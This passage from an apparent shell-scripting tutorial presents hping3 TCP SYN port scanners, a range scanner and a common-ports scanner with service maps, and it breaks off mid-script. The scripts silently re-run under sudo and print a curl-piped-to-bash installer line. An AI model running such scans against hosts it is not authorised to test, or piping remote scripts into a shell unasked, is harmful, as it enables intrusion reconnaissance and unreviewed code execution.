    [110]="POP3"
    [111]="RPC"
    [135]="MSRPC"
    [139]="NetBIOS"
    [143]="IMAP"
    [443]="HTTPS"
    [445]="SMB"
    [587]="SMTP-TLS"
    [993]="IMAPS"
    [995]="POP3S"
    [1433]="MSSQL"
    [1521]="Oracle"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [5900]="VNC"
    [6379]="Redis"
    [8080]="HTTP-Alt"
    [8443]="HTTPS-Alt"
    [9200]="Elasticsearch"
    [11211]="Memcached"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./tcp_syn_scan.sh"
    echo "Usage: $script_name <target> [start_port] [end_port] [threads]"
    echo "  target     - Hostname or IP address to scan"
    echo "  start_port - Starting port number (default: 1)"
    echo "  end_port   - Ending port number (default: 1000)"
    echo "  threads    - Number of parallel threads (default: 50)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                # Scan ports 1-1000"
    echo "  $script_name 192.168.1.1 1 100         # Scan ports 1-100"
    echo "  $script_name server.local 20 25        # Scan ports 20-25"
    echo "  $script_name example.com 1 65535 100   # Full scan with 100 threads"
    echo ""
    echo "Common Port Ranges:"
    echo "  1-1000      - Common ports (default)"
    echo "  1-65535     - All ports"
    echo "  20-445      - Common services"
    echo "  1024-5000   - User ports"
    echo "  49152-65535 - Dynamic/private ports"
}

# Function to validate port range
validate_ports() {
    local start=$1
    local end=$2
    
    if ! [[ "$start" =~ ^[0-9]+$ ]] || ! [[ "$end" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Port numbers must be integers${NC}"
        return 1
    fi
    
    if [ "$start" -lt 1 ] || [ "$start" -gt 65535 ] || [ "$end" -lt 1 ] || [ "$end" -gt 65535 ]; then
        echo -e "${RED}Error: Port numbers must be between 1-65535${NC}"
        return 1
    fi
    
    if [ "$start" -gt "$end" ]; then
        echo -e "${RED}Error: Start port must be less than or equal to end port${NC}"
        return 1
    fi
    
    return 0
}

# Function to get service name
get_service() {
    local port=$1
    if [[ -n "${SERVICE_PORTS[$port]}" ]]; then
        echo "${SERVICE_PORTS[$port]}"
    else
        # Try to get from system services file
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "unknown"
        fi
    fi
}

# Function to scan a single port
scan_port() {
    local target=$1
    local port=$2
    local tmpfile=$3
    
    # Run hping3 with timeout
    local result=$(timeout 2 hping3 -S -p "$port" -c 1 "$target" 2>/dev/null)
    
    if echo "$result" | grep -q "flags=SA"; then
        # Port is open (SYN+ACK received)
        local service=$(get_service "$port")
        echo "$port:open:$service" >> "$tmpfile"
        echo -e "${GREEN}[✓] Port $port/tcp open - $service${NC}"
    elif echo "$result" | grep -q "flags=RA"; then
        # Port is closed (RST+ACK received)
        echo "$port:closed" >> "${tmpfile}.closed"
    else
        # Port is filtered or no response
        echo "$port:filtered" >> "${tmpfile}.filtered"
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate port range
if ! validate_ports "$START_PORT" "$END_PORT"; then
    exit 1
fi

# Validate threads
if ! [[ "$THREADS" =~ ^[0-9]+$ ]] || [ "$THREADS" -lt 1 ] || [ "$THREADS" -gt 500 ]; then
    echo -e "${RED}Error: Threads must be between 1-500${NC}"
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check for a timeout command (macOS: coreutils installs it as gtimeout)
if command -v timeout &> /dev/null; then
    :  # native timeout available
elif command -v gtimeout &> /dev/null; then
    # Expose coreutils' gtimeout under the name the scan function expects
    timeout() {
        gtimeout "$@"
    }
else
    echo -e "${YELLOW}Warning: timeout command not found${NC}"
    echo "Install with: brew install coreutils"
    echo "Continuing without timeout protection..."
    echo ""
    
    # Fallback: drop the timeout value and run the command directly
    timeout() {
        shift  # Remove the timeout value
        "$@"   # Execute the command directly
    }
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total ports
TOTAL_PORTS=$((END_PORT - START_PORT + 1))

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║        TCP SYN PORT SCANNER            ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}        $TARGET"
echo -e "  ${BLUE}Port Range:${NC}    $START_PORT - $END_PORT"
echo -e "  ${BLUE}Total Ports:${NC}   $TOTAL_PORTS"
echo -e "  ${BLUE}Threads:${NC}       $THREADS"
echo -e "  ${BLUE}Scan Type:${NC}     TCP SYN (Half-open)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Resolve target to IP
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Create temporary files
TMPDIR=$(mktemp -d)
OPEN_PORTS_FILE="$TMPDIR/open_ports"
trap "rm -rf $TMPDIR" EXIT

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting TCP SYN scan...${NC}"
echo -e "${YELLOW}[*] Scanning $TOTAL_PORTS ports with $THREADS parallel threads${NC}"
echo ""

# Progress tracking
SCANNED=0
JOBS_COUNT=0

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d ports)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
for port in $(seq $START_PORT $END_PORT); do
    # Launch scan in background
    scan_port "$TARGET_IP" "$port" "$OPEN_PORTS_FILE" &
    
    # Manage parallel jobs
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$THREADS" ]; do
        sleep 0.05
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_PORTS"
done

# Wait for remaining jobs
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Process results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count results
OPEN_COUNT=0
CLOSED_COUNT=0
FILTERED_COUNT=0

if [ -f "$OPEN_PORTS_FILE" ]; then
    OPEN_COUNT=$(wc -l < "$OPEN_PORTS_FILE" | tr -d ' ')
fi
if [ -f "${OPEN_PORTS_FILE}.closed" ]; then
    CLOSED_COUNT=$(wc -l < "${OPEN_PORTS_FILE}.closed" | tr -d ' ')
fi
if [ -f "${OPEN_PORTS_FILE}.filtered" ]; then
    FILTERED_COUNT=$(wc -l < "${OPEN_PORTS_FILE}.filtered" | tr -d ' ')
fi

# Display open ports
if [ "$OPEN_COUNT" -gt 0 ]; then
    echo -e "${GREEN}[✓] Found $OPEN_COUNT open port(s)${NC}"
    echo ""
    echo -e "${MAGENTA}Open Ports:${NC}"
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    printf "${WHITE}%-10s %-15s %s${NC}\n" "PORT" "STATE" "SERVICE"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Sort and display open ports
    sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port state service; do
        printf "${GREEN}%-10s${NC} ${GREEN}%-15s${NC} ${YELLOW}%s${NC}\n" "$port/tcp" "$state" "$service"
    done
    
    # Save detailed report
    REPORT_FILE="tcp_scan_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "TCP SYN Scan Report"
        echo "==================="
        echo "Target: $TARGET ($TARGET_IP)"
        echo "Port Range: $START_PORT - $END_PORT"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo "Scan Rate: $(( TOTAL_PORTS / (DURATION + 1) )) ports/second"
        echo ""
        echo "Results Summary:"
        echo "----------------"
        echo "Open ports: $OPEN_COUNT"
        echo "Closed ports: $CLOSED_COUNT"
        echo "Filtered ports: $FILTERED_COUNT"
        echo ""
        echo "Open Ports Detail:"
        echo "------------------"
        sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port state service; do
            printf "%-10s %-15s %s\n" "$port/tcp" "$state" "$service"
        done
    } > "$REPORT_FILE"
    
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}[*] Detailed report saved to: $REPORT_FILE${NC}"
else
    echo -e "${YELLOW}[-] No open ports found in the specified range${NC}"
    echo -e "${YELLOW}    Possible reasons:${NC}"
    echo -e "${YELLOW}    • All ports are closed or filtered${NC}"
    echo -e "${YELLOW}    • Firewall is blocking SYN packets${NC}"
    echo -e "${YELLOW}    • Target is down or unreachable${NC}"
fi

# Display statistics
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Ports Scanned:${NC}  $TOTAL_PORTS"
echo -e "  ${GREEN}Open:${NC}           $OPEN_COUNT"
echo -e "  ${RED}Closed:${NC}         $CLOSED_COUNT"
echo -e "  ${YELLOW}Filtered:${NC}       $FILTERED_COUNT"
echo -e "  ${BLUE}Scan Duration:${NC}  ${DURATION} seconds"
echo -e "  ${BLUE}Scan Rate:${NC}      ~$(( TOTAL_PORTS / (DURATION + 1) )) ports/sec"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./tcp_syn_scan.sh

How to Run:

# Scan default ports 1-1000
./tcp_syn_scan.sh example.com

# Scan specific range
./tcp_syn_scan.sh 192.168.1.1 1 100

# Quick scan of common services
./tcp_syn_scan.sh server.local 20 445

# Full port scan with 100 threads
./tcp_syn_scan.sh example.com 1 65535 100

# Scan the full range from port 80 through 443
./tcp_syn_scan.sh webserver.com 80 443

# Scan database ports
./tcp_syn_scan.sh dbserver.com 3300 3400

# Get help
./tcp_syn_scan.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to scan
– **start_port** (optional, default: 1): First port in the range to scan
– **end_port** (optional, default: 1000): Last port in the range to scan
– **threads** (optional, default: 50): Number of parallel scan processes (1-500)
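Internally the scanner collects one `port:state:service` record per open port, then sorts numerically on the port field for the report. A quick sketch of that record handling (the ports and services below are illustrative):

```shell
# Open-port records in the port:state:service format the scanner collects
RECORDS=$(mktemp)
printf '%s\n' "443:open:HTTPS" "22:open:SSH" "80:open:HTTP" > "$RECORDS"

# Numeric sort on the port field, then format each record like the report does
TABLE=$(sort -t: -k1 -n "$RECORDS" | while IFS=: read -r port state service; do
    printf '%-10s %-8s %s\n' "$port/tcp" "$state" "$service"
done)
echo "$TABLE"
rm -f "$RECORDS"

# First column of the first row should be the lowest port
FIRST_PORT=$(echo "$TABLE" | head -1 | awk '{print $1}')
```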

Script 5: Common Ports Scanner

Purpose:
Scans a predefined list of commonly used ports with service identification. This is more efficient than scanning large port ranges when looking for standard services.
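The script stores each category's ports as one comma-separated string; expanding a category into individual ports is a simple `tr` split. A small sketch (the category contents below are an illustrative subset):

```shell
# A category entry as stored in the PORT_CATEGORIES table (illustrative subset)
WEB_PORTS="80,443,8080,8443"

# Expand the comma-separated list into one port per line
EXPANDED=$(echo "$WEB_PORTS" | tr ',' '\n')
echo "$EXPANDED"
FIRST=$(echo "$EXPANDED" | head -1)

# Count how many ports the category covers
COUNT=$(echo "$EXPANDED" | wc -l | tr -d ' ')
echo "scanning $COUNT ports"
```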

Create the Script:

# Install GNU coreutils first — it provides the timeout command the scanner uses
brew install coreutils

cat > ./common_ports_scan.sh << 'EOF'
#!/bin/zsh

# Common Ports Scanner using hping3
# Scans commonly used ports with predefined or custom port lists
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
SCAN_TYPE="${2:-default}"
CUSTOM_PORTS="$3"
THREADS="${4:-50}"

# Port categories
declare -A PORT_CATEGORIES=(
    ["default"]="21,22,23,25,53,80,110,143,443,445,3306,3389,5432,8080,8443"
    ["web"]="80,443,8080,8443,8000,8888,3000,5000,9000"
    ["mail"]="25,110,143,465,587,993,995"
    ["database"]="1433,1521,3306,5432,5984,6379,7000,7001,8086,9042,9200,11211,27017"
    ["remote"]="22,23,3389,5900,5901,5902"
    ["file"]="20,21,69,139,445,873,2049"
    ["top100"]="7,9,13,21,22,23,25,26,37,53,79,80,81,88,106,110,111,113,119,135,139,143,144,179,199,389,427,443,444,445,465,513,514,515,543,544,548,554,587,631,646,873,990,993,995,1025,1026,1027,1028,1029,1110,1433,1521,1701,1720,1723,1755,1900,2000,2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000,6001,6379,6646,7000,7070,8000,8008,8009,8080,8081,8443,8888,9100,9200,9999,10000,27017,32768,49152,49153,49154,49155,49156,49157"
    ["top1000"]="1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702
,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5922,5925,5950,5952,5959,5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6379,6389,6502,6510,6543,6547,6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,9300,9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004
,10009,10010,10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11211,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27017,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"
)

# Service mapping
declare -A SERVICE_NAMES=(
    [20]="FTP-Data"
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [67]="DHCP"
    [68]="DHCP"
    [69]="TFTP"
    [80]="HTTP"
    [110]="POP3"
    [123]="NTP"
    [135]="MSRPC"
    [137]="NetBIOS-NS"
    [138]="NetBIOS-DGM"
    [139]="NetBIOS-SSN"
    [143]="IMAP"
    [161]="SNMP"
    [162]="SNMP-Trap"
    [389]="LDAP"
    [443]="HTTPS"
    [445]="SMB"
    [465]="SMTPS"
    [514]="Syslog"
    [515]="LPD"
    [587]="SMTP-TLS"
    [636]="LDAPS"
    [873]="Rsync"
    [993]="IMAPS"
    [995]="POP3S"
    [1433]="MSSQL"
    [1521]="Oracle"
    [1723]="PPTP"
    [2049]="NFS"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [5900]="VNC"
    [5984]="CouchDB"
    [6379]="Redis"
    [7000]="Cassandra"
    [8000]="HTTP-Alt"
    [8080]="HTTP-Proxy"
    [8086]="InfluxDB"
    [8443]="HTTPS-Alt"
    [8888]="HTTP-Alt2"
    [9000]="SonarQube"
    [9042]="Cassandra-CQL"
    [9200]="Elasticsearch"
    [11211]="Memcached"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./common_ports_scan.sh"
    echo "Usage: $script_name <target> [scan_type|custom_ports] [threads]"
    echo ""
    echo "Scan Types:"
    echo "  default    - Top 15 most common ports (default)"
    echo "  web        - Web server ports (80, 443, 8080, etc.)"
    echo "  mail       - Mail server ports (25, 110, 143, etc.)"
    echo "  database   - Database ports (MySQL, PostgreSQL, MongoDB, etc.)"
    echo "  remote     - Remote access ports (SSH, RDP, VNC, etc.)"
    echo "  file       - File sharing ports (FTP, SMB, NFS, etc.)"
    echo "  top100     - Top 100 most common ports"
    echo "  top1000    - Top 1000 most common ports"
    echo "  custom     - Specify custom ports as comma-separated list"
    echo ""
    echo "Parameters:"
    echo "  target     - Hostname or IP address to scan"
    echo "  scan_type  - Type of scan or comma-separated port list"
    echo "  threads    - Number of parallel threads (default: 50)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                    # Scan default ports"
    echo "  $script_name example.com web                # Scan web ports"
    echo "  $script_name example.com database           # Scan database ports"
    echo "  $script_name example.com top100             # Scan top 100 ports"
    echo "  $script_name example.com \"22,80,443,3306\"   # Custom ports"
    echo "  $script_name example.com top1000 100        # Top 1000 with 100 threads"
}

# Function to get service name
get_service_name() {
    local port=$1
    if [[ -n "${SERVICE_NAMES[$port]}" ]]; then
        echo "${SERVICE_NAMES[$port]}"
    else
        # Try to get from system services
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "Unknown"
        fi
    fi
}

# Function to scan a single port
scan_port() {
    local target=$1
    local port=$2
    local tmpfile=$3
    
    # Run hping3 with timeout
    local result=$(timeout 2 hping3 -S -p "$port" -c 1 "$target" 2>/dev/null || true)
    
    if echo "$result" | grep -q "flags=SA"; then
        # Port is open (SYN+ACK received)
        local service=$(get_service_name "$port")
        echo "$port:$service" >> "$tmpfile"
        echo -e "${GREEN}[✓] Port $port/tcp open - $service${NC}"
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Determine ports to scan
if [[ "$SCAN_TYPE" =~ ^[0-9,]+$ ]]; then
    # Custom ports provided
    PORTS_TO_SCAN="$SCAN_TYPE"
    SCAN_DESCRIPTION="Custom ports"
elif [[ -n "${PORT_CATEGORIES[$SCAN_TYPE]}" ]]; then
    # Predefined category
    PORTS_TO_SCAN="${PORT_CATEGORIES[$SCAN_TYPE]}"
    SCAN_DESCRIPTION="$SCAN_TYPE ports"
else
    # Invalid scan type, use default
    PORTS_TO_SCAN="${PORT_CATEGORIES[default]}"
    SCAN_DESCRIPTION="Default common ports"
    if [[ -n "$SCAN_TYPE" ]] && [[ "$SCAN_TYPE" != "default" ]]; then
        echo -e "${YELLOW}Warning: Unknown scan type '$SCAN_TYPE', using default${NC}"
    fi
fi

# Parse threads parameter
if [[ -n "$CUSTOM_PORTS" ]] && [[ "$CUSTOM_PORTS" =~ ^[0-9]+$ ]]; then
    THREADS="$CUSTOM_PORTS"
elif [[ -n "$3" ]] && [[ "$3" =~ ^[0-9]+$ ]]; then
    THREADS="$3"
fi

# Validate threads
if ! [[ "$THREADS" =~ ^[0-9]+$ ]] || [ "$THREADS" -lt 1 ] || [ "$THREADS" -gt 500 ]; then
    THREADS=50
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check for timeout command and create appropriate wrapper
if command -v gtimeout &> /dev/null; then
    # macOS with coreutils installed
    timeout() {
        gtimeout "$@"
    }
elif command -v timeout &> /dev/null; then
    # Linux or other systems with timeout
    timeout() {
        command timeout "$@"
    }
else
    # No timeout command available
    echo -e "${YELLOW}Warning: timeout command not found${NC}"
    echo "Install with: brew install coreutils"
    echo "Continuing without timeout protection..."
    echo ""
    timeout() {
        shift  # Remove timeout value
        "$@"   # Execute command directly
    }
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Split the comma-separated port list into an array (zsh syntax; this avoids
# leaving IFS permanently altered for the rest of the script)
PORT_ARRAY=("${(@s:,:)PORTS_TO_SCAN}")
TOTAL_PORTS=${#PORT_ARRAY[@]}

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║      COMMON PORTS SCANNER              ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}      $TARGET"
echo -e "  ${BLUE}Scan Type:${NC}   $SCAN_DESCRIPTION"
echo -e "  ${BLUE}Total Ports:${NC} $TOTAL_PORTS"
echo -e "  ${BLUE}Threads:${NC}     $THREADS"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Resolve target
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Create temporary files
TMPDIR=$(mktemp -d)
OPEN_PORTS_FILE="$TMPDIR/open_ports"
trap "rm -rf $TMPDIR" EXIT

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting scan of $TOTAL_PORTS common ports...${NC}"
echo ""

# Progress tracking
SCANNED=0

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    if [ "$total" -eq 0 ]; then
        return
    fi
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d ports)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
for port in "${PORT_ARRAY[@]}"; do
    # Remove any whitespace
    port=$(echo "$port" | tr -d ' ')
    
    # Launch scan in background
    scan_port "$TARGET_IP" "$port" "$OPEN_PORTS_FILE" &
    
    # Manage parallel jobs
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$THREADS" ]; do
        sleep 0.05
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_PORTS"
done

# Wait for remaining jobs
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Process results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count open ports
OPEN_COUNT=0
if [ -f "$OPEN_PORTS_FILE" ]; then
    OPEN_COUNT=$(wc -l < "$OPEN_PORTS_FILE" | tr -d ' ')
fi

# Display results
if [ "$OPEN_COUNT" -gt 0 ]; then
